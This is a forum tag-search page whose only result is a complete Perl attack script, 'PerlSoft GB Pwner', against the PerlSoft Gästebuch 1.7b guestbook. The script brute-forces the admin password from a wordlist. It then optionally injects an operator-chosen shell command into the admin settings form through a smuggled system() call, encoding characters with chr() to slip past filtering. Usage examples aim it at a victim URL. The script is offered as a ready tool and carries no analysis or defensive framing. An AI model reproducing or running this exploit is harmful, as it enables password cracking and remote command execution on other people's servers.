Jump to content
Fórum Script Brasil

Search the Community

Showing results for tags 'deep web'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Programação & Desenvolvimento
    • ASP
    • PHP
    • .NET
    • Java
    • C, C++
    • Delphi, Kylix
    • Lógica de Programação
    • Mobile
    • Visual Basic
    • Outras Linguagens de Programação
  • WEB
    • HTML, XHTML, CSS
    • Ajax, JavaScript, XML, DOM
    • Editores
  • Arte & Design
    • Corel Draw
    • Fireworks
    • Flash & ActionScript
    • Photoshop
    • Outros Programas de Arte e Design
  • Sistemas Operacionais
    • Microsoft Windows
    • GNU/Linux
    • Outros Sistemas Operacionais
  • Softwares, Hardwares e Redes
    • Microsoft Office
    • Softwares Livres
    • Outros Softwares
    • Hardware
    • Redes
  • Banco de Dados
    • Access
    • MySQL
    • PostgreSQL
    • SQL Server
    • Demais Bancos
  • Segurança e Malwares
    • Segurança
    • Remoção De Malwares
  • Empregos
    • Vagas Efetivas
    • Vagas para Estágios
    • Oportunidades para Freelances
  • Negócios & Oportunidades
    • Classificados & Serviços
    • Eventos
  • Geral
    • Avaliações de Trabalhos
    • Links
    • Outros Assuntos
    • Entretenimento
  • Script Brasil
    • Novidades e Anúncios Script Brasil
    • Mercado Livre / Mercado Sócios
    • Sugestões e Críticas
    • Apresentações

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 1 result

  1. #!/usr/bin/perl =pod Typ: Bruter & RCE Name: PerlSoft GB Pwner Affected Software: PerlSoft G�stebuch Version: 1.7b Coder/Bugfounder: Perforin Visit: DarK-CodeZ.org Note: RCE ist only 1 time possible, do not waste your command! =cut use strict; use warnings; use diagnostics; use LWP::Simple; use LWP::Simple::Post qw(post post_xml); my ($url,$user,$wordlist,$error_counter,$word,$anfrage); my ($falsch,$richtig,$entry,$rce,$send,$crypted); my (@response,@rcesend,@array); if (@ARGV < 4) { &fail; } ($url,$user,$wordlist) = (@ARGV); $falsch = '<tr><td align=center><Font color="000000" FACE="Arial">Nur Administratoren mit g&uuml;ltigen Benutzerdaten haben Zugang in das Admin-Center!</font></td></tr>'; $richtig = '<tr><td bgcolor=#E0E0E0 align=center><B><Font color="000000" FACE="Arial">G&auml;stebuch Vorlage - Einstellen</font></B></td></tr>'; if ($url !~ m/^http:\/\//) { &fail; } if ($wordlist !~ m/\.(txt|list|dat)$/) { &fail; } print <<"show"; --==[Perforins PerlSoft GB Pwner]==-- [+] Attack: $url [+] User: $user [+] Wordlist: $wordlist show open(WordList,"<","$wordlist") || die "No wordlist found!"; foreach $word (<WordList>) { chomp($word); $crypted = crypt($word,"codec"); $anfrage = $url.'?sub=vorlage&id='.$user.'&pw='.$crypted; @array = get($anfrage) || (print "[-] Cannot connect!\n") && exit; foreach $entry (@array) { if ($entry =~ m/$richtig/i) { print "\n[+] Password cracked: "."$crypted:$word"." !\n\n"; if ($ARGV[3] =~ m/yes/i ) { print <<"RCE"; [+] Remote Command Execution possible! [~] Note: Only _1_ time exploitable, do not waste it! [+] Please enter your Command! RCE chomp($rce = <STDIN>); $rce =~ s/>/\"\.chr(62)\.\"/ig; $rce =~ s/</\"\.chr(60)\.\"/ig; $rce =~ s/\|/\"\.chr(124)\.\"/ig; $rce =~ s/&/\"\.chr(38)\.\"/ig; $rce =~ s/\//\"\.chr(47)\.\"/ig; $rce =~ s/-/\"\.chr(45)\.\"/ig; $send = 'loginname='.$user.'&loginpw='.$word.'&loginname1='.$user.'";system("'.$rce.'");print "h4x&loginpw1='.$word.'&loginpw2='.$word.'&id='.$user.'&pw='.$crypted.'&sub=saveadmindaten'; @response = post($url, $send); @rcesend = get($url) || (print "[-] Cannot connect!\n") && exit; print <<"END"; [+] Command executed! ---====[www.vx.perforin.de.vu]====--- END exit; } else { (print "---====[www.vx.perforin.de.vu]====---\n") and exit; } } elsif ($entry =~ m/$falsch/i) { $error_counter++; print "[~] Tested ".$error_counter.": "."$crypted:$word"."\n"; } } } close(WordList); print "[-] Could not be cracked!\n"; exit; sub fail { print <<"CONFIG"; +-------------------+ | | | PerlSoft GB Pwner | | v0.1 | | | +-------------------+-----[Coded by Perforin]-----------------------------+ | | | brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt yes | | brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt no | | | | yes = Remote Command Execution | | no = No Remote Command Execution | | | +-------------------------[vx.perforin.de.vu]-----------------------------+ CONFIG exit; }
×
×
  • Create New...